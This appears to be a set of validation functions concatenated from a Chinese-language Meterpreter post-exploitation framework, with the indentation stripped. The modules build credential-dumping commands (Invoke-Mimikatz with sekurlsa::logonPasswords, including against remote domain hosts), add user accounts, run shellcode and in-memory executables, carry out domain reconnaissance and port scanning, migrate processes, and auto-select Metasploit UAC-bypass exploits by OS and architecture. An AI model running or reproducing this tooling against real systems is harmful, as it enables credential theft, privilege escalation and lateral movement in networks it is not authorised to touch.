def check(self):
"""执行前的检查函数"""
script = self.get_option_filename()
if script is None:
return False, "请选择执行shellcode文件,文件后缀必须为bin"
else:
self.set_option(key='SHELLCODE_FILE', value=script)
self.set_option(key='CHANNELIZED', value=self.param('CHANNELIZED'))
wait_ouput = self.param('WAIT_OUTPUT')
if wait_ouput < 3:
wait_ouput = 3
elif wait_ouput > 180:
wait_ouput = 180
self.set_option(key='WAIT_OUTPUT', value=wait_ouput)
self.set_option(key='KILL', value=self.param('KILL'))
from PostModule.lib.Session import Session
session = Session(self._sessionid)
if session.is_alive:
pass
else:
return False, "Session不可用"
if session.is_windows:
pass
else:
return False, "模块只支持Windows系统"
if self.param('ARCH') in ["x86", "x64"]:
self.set_option(key='ARCH', value=self.param("ARCH"))
else:
return False, "Arch输入错误"
return True, None
def check(self):
"""执行前的检查函数"""
session = Session(self._sessionid)
if session.is_windows:
return True, None
else:
return False, "此模块只支持Windows的Meterpreter"
def check(self):
"""执行前的检查函数"""
session = Session(self._sessionid)
if session.is_windows is not True:
return False, "模块只支持Windows的Meterpreter"
if session.is_admin is not True:
return False, "模块需要管理员权限,请尝试提权"
computerName = self.param('ComputerName')
mimikatzCommand = self.param('MimikatzCommand')
largeOutPut = self.param('LargeOutPut')
self.set_largeoutput(largeOutPut)
if mimikatzCommand is None:
mimikatzCommand = 'privilege::debug sekurlsa::logonPasswords exit'
if computerName is None:
execute_string = "Invoke-Mimikatz -Command '{}'".format(mimikatzCommand)
else:
if session.is_in_domain is not True:
return False, "如果需要抓取域内远程主机的密码信息,Session必须在域中"
execute_string = "Invoke-Mimikatz -Command '{}' -ComputerName {}".format(mimikatzCommand,
computerName)
self.set_execute_string(execute_string)
return True, None
def check(self):
"""执行前的检查函数,函数必须返回值"""
username = self.param('UserName')
password = self.param('Password')
computername = self.param('ComputerName')
groupname = self.param('GroupName')
domain = self.param('Domain')
from PostModule.lib.Session import Session
session = Session(self._sessionid)
if session.is_windows is not True:
return False, "模块只支持Windows的Meterpreter"
if computername is not None:
execute_string = "Add-NetUser -UserName {} -Password {} -ComputerName {}".format(username,
password,
computername)
elif groupname is not None and domain is not None:
if session.is_in_domain:
execute_string = "Add-NetUser -UserName {} -Password {} -GroupName {} -Domain {}".format(
username,
password,
groupname,
domain)
else:
return False, "模块只支持Windows的Meterpreter,且必须在域中"
else:
execute_string = "Add-NetUser -UserName {} -Password {}".format(username, password)
self.set_execute_string(execute_string)
return True, None
def check(self):
"""执行前的检查函数"""
from PostModule.lib.Session import Session
session = Session(self._sessionid)
if session.is_alive:
return True, None
else:
return False, "当前Session不可用"
def check(self):
"""执行前的检查函数"""
session = Session(self._sessionid)
if session.is_in_domain is not True:
return False, "模块只支持Windows的Meterpreter,且必须在域中"
groupName = self.param('GroupName')
execute_string = "Get-NetGroupMember -GroupName {}".format(groupName)
self.set_execute_string(execute_string)
return True, None
def check(self):
from PostModule.lib.Session import Session
"""执行前的检查函数"""
session = Session(self._sessionid)
if session.is_in_domain:
self.set_execute_string('Get-NetDomainController | ConvertTo-JSON -maxDepth 1')
return True, None
else:
return False, "此模块只支持Windows的Meterpreter,且必须在域中"
def check(self):
from PostModule.lib.Session import Session
"""执行前的检查函数"""
session = Session(self._sessionid)
if session.is_in_domain:
self.set_execute_string('Get-Domain | ConvertTo-JSON -maxDepth 1')
return True, None
else:
return False, "Session必须在域中"
def check(self):
"""执行前的检查函数"""
from PostModule.lib.Session import Session
session = Session(self._sessionid)
if session.is_in_domain:
self.set_execute_string('Get-NetGroup')
return True, None
else:
return False, "模块只支持Windows的Meterpreter,且必须在域中"
def check(self):
"""执行前的检查函数"""
# session 检查
from PostModule.lib.Session import Session
self.session = Session(self._sessionid)
if self.session.is_alive is not True:
return False, "当前session不可用"
# 参数检查
startip = self.param('startip')
stopip = self.param('stopip')
port_list = self.param('port_list')
timeout = self.param('timeout')
connect_time_out = self.param('connect_time_out')
max_threads = self.param('max_threads')
# 检查ip地址
try:
ipnum = self.dqtoi(stopip) - self.dqtoi(startip)
if ipnum > 256:
return False, "扫描IP范围过大(超过256),请缩小范围"
elif ipnum < 0:
return False, "输入的起始IP与结束IP有误,请重新输入"
self.set_script_param('startip', startip)
self.set_script_param('stopip', stopip)
except Exception as E:
return False, "输入的IP格式有误,请重新输入"
# 检查port_list
try:
list_str = "[{}]".format(port_list)
port_list_net = json.loads(list_str)
if len(port_list_net) > 100:
return False, "扫描端口数量过大(超过100),请缩小范围"
elif len(port_list_net) <= 0:
return False, "输入的端口列表有误,请重新输入"
port_list_tmp = port_list_net
for port in port_list_tmp:
if 0 < port <= 65535:
pass
else:
port_list_net.remove(port)
self.set_script_param('port_list', port_list_net)
except Exception as E:
return False, "输入的端口列表有误,请重新输入"
# 检查timeout
if timeout <= 0 or timeout > 600:
return False, "输入的模块超时时间有误(最大值600),请重新输入"
if connect_time_out <= 0 or connect_time_out > 3000:
return False, "输入的连接超时时间有误(最大值3000),请重新输入"
if max_threads <= 0 or max_threads > 20:
return False, "输入的扫描线程数有误(最大值20),请重新输入"
self.set_script_param('time_out', connect_time_out / 1000)
self.set_script_param('max_threads', max_threads)
self.set_script_timeout(timeout)
return True, None
def check(self):
"""执行前的检查函数"""
session = Session(self._sessionid)
if not session.is_windows:
return False, "模块只支持Meterpreter类型的Session"
if not session.is_in_domain:
return False, "模块初始Sesion必须在域中"
if not session.is_admin:
return False, "模块初始Sesion必须拥有本地管理员权限"
return True, None
def check(self):
"""执行前的检查函数"""
from PostModule.lib.Session import Session
self.session = Session(self._sessionid)
if self.session.is_windows is not True:
return False, "此模块只支持Windows的Meterpreter"
if self.session.is_admin is not True:
return False, "此模块需要管理员权限,请尝试提权"
return True, None
def check(self):
"""执行前的检查函数"""
from PostModule.lib.Session import Session
session = Session(self._sessionid)
if not session.is_windows:
return False, "模块只支持Windows的Meterpreter"
if session.is_admin is True:
self.set_option('TECHNIQUE', self.param('TECHNIQUE'))
return True, None
else:
return False, "模块需要管理员权限,请尝试使用UAC绕过模块"
def check(self):
"""执行前的检查函数"""
from PostModule.lib.Session import Session
session = Session(self._sessionid)
if session.is_windows:
pass
else:
return False, "此模块只支持Meterpreter类型的Session"
self.set_payload_by_handler()
if 'windows' not in self.opts.get('PAYLOAD').lower():
return False, "选择handler错误,建议选择windows平台的handler"
return True, None
def check(self):
"""执行前的检查函数"""
from PostModule.lib.Session import Session
session = Session(self._sessionid)
if not session.is_windows:
return False, "此模块只支持Windows的Meterpreter"
if not session.is_admin:
return False, "模块要求最低权限为管理员权限,如需低权限进程迁移,请选择<Session克隆>模块"
flag = self.set_payload_by_handler()
if not flag:
return False, "Handler设置失败,请重新设置"
return True, None
def check(self):
"""执行前的检查函数"""
session = Session(self._sessionid)
if session.is_windows is not True:
return False, "模块只支持Windows的Meterpreter"
computerName = self.param('ComputerName')
if computerName is None:
execute_string = "Get-NetProcess"
else:
if session.is_in_domain:
execute_string = "Get-NetProcess -ComputerName {}".format(computerName)
else:
return False, "模块只支持Windows的Meterpreter,且必须在域中"
self.set_execute_string(execute_string)
return True, None
def check(self):
"""执行前的检查函数"""
DarkGuardian_path = self.param("DarkGuardian_path")
self.set_option(key='DarkGuardian_path', value=DarkGuardian_path)
from PostModule.lib.Session import Session
session = Session(self._sessionid)
if session.is_alive:
pass
else:
return False, "Session不可用"
if session.is_windows:
pass
else:
return False, "模块只支持Windows系统"
return True, None
def check(self):
"""执行前的检查函数"""
action = self.param("action")
from PostModule.lib.Session import Session
session = Session(self._sessionid)
if session.is_alive:
pass
else:
return False, "Session不可用"
if session.is_admin:
pass
else:
return False, "模块需要系统管理员权限"
self.set_option("Action", action)
return True, None
def check(self):
"""执行前的检查函数"""
from PostModule.lib.Session import Session
session = Session(self._sessionid)
if session.is_windows:
pass
else:
return False, "此模块只支持Meterpreter类型的Session"
self.set_option("ADDTODOMAIN", self.param("ADDTODOMAIN"))
self.set_option("USERNAME", self.param("USERNAME"))
self.set_option("PASSWORD", self.param("PASSWORD"))
self.set_option("GROUP", self.param("GROUP"))
self.set_option("TOKEN", self.param("TOKEN"))
return True, None
def update_domain_hosts_has_session(self):
"""更新已获取权限列表"""
sessions = SessionList.list_sessions()
for domain_host in self.domain_hosts:
for one_session in sessions:
# 如果session_host存在于主机的列表中,再进行进一步权限检查
if one_session.get('session_host') in domain_host.get(
'ipaddress'):
session_intent = Session(one_session.get('id'))
if session_intent.is_admin: # 检查是否获取了admin权限
# 去重添加
if domain_host not in self.domain_hosts_has_session:
self.domain_hosts_has_session.append(domain_host)
self.log_good(
"发现新可用Session,SID:{} IP:{} 主机名:{}".format(
session_intent.sessionid,
session_intent.session_host,
session_intent.computer))
def check(self):
"""执行前的检查函数"""
script = self.get_option_filename()
if script is None:
return False, "请选择执行的脚本,脚本后缀必须为py或pyc"
self.set_script(script)
timeout = self.param("timeout")
# 检查timeout
if timeout < 5 or timeout > 3600:
return False, "输入的模块超时时间有误(最小值60,最大值3600),请重新输入"
self.set_script_timeout(timeout)
from PostModule.lib.Session import Session
session = Session(self._sessionid)
if session.is_alive:
return True, None
else:
return False, "Session不可用"
def check(self):
"""执行前的检查函数"""
self.session = Session(self._sessionid, uacinfo=True)
if self.session.is_in_domain:
pass
else:
return False, "选择的Session不在域中,请重新选择Session"
# 检查权限
if self.session.is_in_admin_group is not True:
return False, "当前Session用户不在本地管理员组中,无法执行模块"
threads = self.param('Threads')
if 1 <= threads <= 20:
pass
else:
return False, "扫描线程设置错误,请重新设置"
self.clean_log()
return True, None
def check(self):
"""执行前的检查函数"""
from PostModule.lib.Session import Session
session = Session(self._sessionid)
if not session.is_windows:
return False, "此模块只支持Windows的Meterpreter"
exe_file = self.get_option_filename()
if exe_file is None:
return False, "请选择执行exe文件,文件后缀必须为exe"
else:
self.set_option(key='ASSEMBLY', value=exe_file)
arguments = self.param("ARGUMENTS")
self.set_option(key='ARGUMENTS', value=arguments)
wait = self.param("WAIT")
self.set_option(key='WAIT', value=wait)
kill = self.param("KILL")
self.set_option(key='KILL', value=kill)
return True, None
def check(self):
"""执行前的检查函数"""
self.set_script("KBCollects.ps1")
timeout = self.param("timeout")
# 检查timeout
if timeout < 5 or timeout > 3600:
return False, "输入的模块超时时间有误(最小值60,最大值3600),请重新输入"
self.set_script_timeout(timeout)
from PostModule.lib.Session import Session
session = Session(self._sessionid)
if session.is_alive:
pass
else:
return False, "Session不可用"
if session.is_windows:
return True, None
else:
return False, "模块只支持Windows系统"
def check(self):
"""执行前的检查函数"""
session = Session(self._sessionid)
if session.is_in_domain is not True:
return False, "模块只支持Windows的Meterpreter,且Session所属用户必须在域中"
if session.is_admin is not True:
return False, "Session权限不足,请选择管理员权限Session"
if session.domain is None:
return False, "无法获取Session所在域"
threads = self.param('threads')
if 1 <= threads <= 20:
pass
else:
return False, "扫描线程参数不正确,请重新设置"
# 设置参数
execute_string = "Find-DomainUserLocation -Domain {} -Threads {} -StopOnSuccess| ConvertTo-JSON -maxDepth 2".format(
session.domain, threads)
self.set_execute_string(execute_string)
return True, None
def check(self):
"""执行前的检查函数"""
session = Session(self._sessionid)
if session.is_windows is not True:
return False, "此模块只支持Windows的Meterpreter"
computerName = self.param('ComputerName')
if computerName is not None:
if session.is_in_domain:
execute_string = "Get-NetLoggedon -ComputerName {} | ConvertTo-JSON -maxDepth 2".format(
computerName)
else:
return False, "当填写'主机名'时Session必须在域中"
elif self.param('Range'):
if session.is_in_domain:
execute_string = 'Get-DomainComputer | Get-NetLoggedon | ConvertTo-JSON -maxDepth 2'
else:
return False, "Session必须在域中"
else:
execute_string = 'Get-NetLoggedon | ConvertTo-JSON -maxDepth 2'
self.set_execute_string(execute_string)
return True, None
def check(self):
"""执行前的检查函数"""
from PostModule.lib.Session import Session
session = Session(self._sessionid, rightinfo=True, uacinfo=True)
self.session = session
if session.is_windows:
pass
else:
return False, "模块只支持Meterpreter类型的Session"
# 检查权限
if session.is_admin or session.is_system:
return False, "当前Session已获取管理员权限,无需执行模块"
if session.is_in_admin_group is not True:
return False, "当前Session用户不在管理员组中,无法执行模块"
# 检查UAC设置
if session.is_uac_enable is not True:
return False, "当前Session用户所在主机未开启UAC或UAC情况未知,无需执行模块"
if session.uac_level in [
Session.UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
Session.UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
Session.UAC_PROMPT_CREDS, Session.UAC_PROMPT_CONSENT
]:
return False, "当前Session用户设置的UAC级别为过高,无法执行模块"
# 检查integrity_level
if session.integrity is None or session.integrity == 'low':
return False, "当前Session的完整性级别过低,无法执行模块"
flag = self.set_payload_by_handler()
if 'windows' not in self.opts.get('PAYLOAD').lower():
return False, "选择handler错误,建议选择windows平台的handler"
# 检查handler和arch是否对应
host_arch = session.arch
try:
if host_arch == 'x64':
if 'x64' not in self.opts.get('PAYLOAD'):
return False, "选择handler的arch错误,建议选择x64平台的handler"
else:
if 'x64' in self.opts.get('PAYLOAD'):
return False, "选择handler的arch错误,建议选择x86平台的handler"
except Exception as E:
return False, "handler检查失败,请正确设置handler"
# 通过适用的操作系统进行正则匹配
host_os = session.os
re_list = [
{
'type': 'exploit',
'mname': 'windows/local/bypassuac_comhijack',
'os_re': 'Windows (7|8|10|2008|2012|2016)',
"arch_list": ["x86", "x64"],
},
{
'type': 'exploit',
'mname': 'windows/local/bypassuac_dotnet_profiler',
'os_re': 'Windows (7|8|2008|2012|10)',
"arch_list": ["x64"],
},
{
'type': 'exploit',
'mname': 'windows/local/bypassuac_eventvwr',
'os_re': 'Windows (7|8|2008|2012|10)',
"arch_list": ["x86", "x64"],
},
{
'type': 'exploit',
'mname': 'windows/local/bypassuac_fodhelper',
'os_re': 'Windows (10)',
"arch_list": ["x86", "x64"],
},
{
'type': 'exploit',
'mname': 'windows/local/bypassuac_injection',
'os_re': 'Windows (7|8|2008|2012|10)',
"arch_list": ["x86", "x64"],
},
{
'type': 'exploit',
'mname': 'windows/local/bypassuac_injection_winsxs',
'os_re': 'Windows (8|10)',
"arch_list": ["x86", "x64"],
},
{
'type': 'exploit',
'mname': 'windows/local/bypassuac_sdclt',
'os_re': 'Windows (Vista|7|8|2008|2012|2016|10)',
"arch_list": ["x64"],
},
{
'type': 'exploit',
'mname': 'windows/local/bypassuac_silentcleanup',
'os_re': 'Windows (Vista|7|8|2008|2012|2016|10)',
"arch_list": ["x86", "x64"],
},
{
'type': 'exploit',
'mname': 'windows/local/bypassuac_sluihijack',
'os_re': 'Windows (8|10)',
"arch_list": ["x86", "x64"],
},
{
'type': 'exploit',
'mname': 'windows/local/bypassuac_vbs',
'os_re': 'Windows (7|2008)',
"arch_list": ["x86", "x64"],
},
{
'type': 'exploit',
'mname': 'windows/local/bypassuac',
'os_re': 'Windows Vista|Windows 2008|Windows [78]',
"arch_list": ["x86", "x64"],
},
]
import re
for one in re_list:
if re.search(one.get('os_re'), host_os) is not None:
if host_arch in one.get('arch_list'):
self.module_path_list.append(one)
if len(self.module_path_list) == 0:
return False, "未找到符合要求的模块,退出执行"
module_select = self.param('module_select')
tmprecord = None
if module_select != 'auto' and module_select != "check": # 不是自动模式
for one in self.module_path_list:
if one.get('mname') == module_select:
tmprecord = [one]
if tmprecord is None:
return False, "选择的Bypass方法不符合Session要求,退出执行"
else:
self.module_path_list = tmprecord
self.opts["SESSION"] = self._sessionid
return True, None
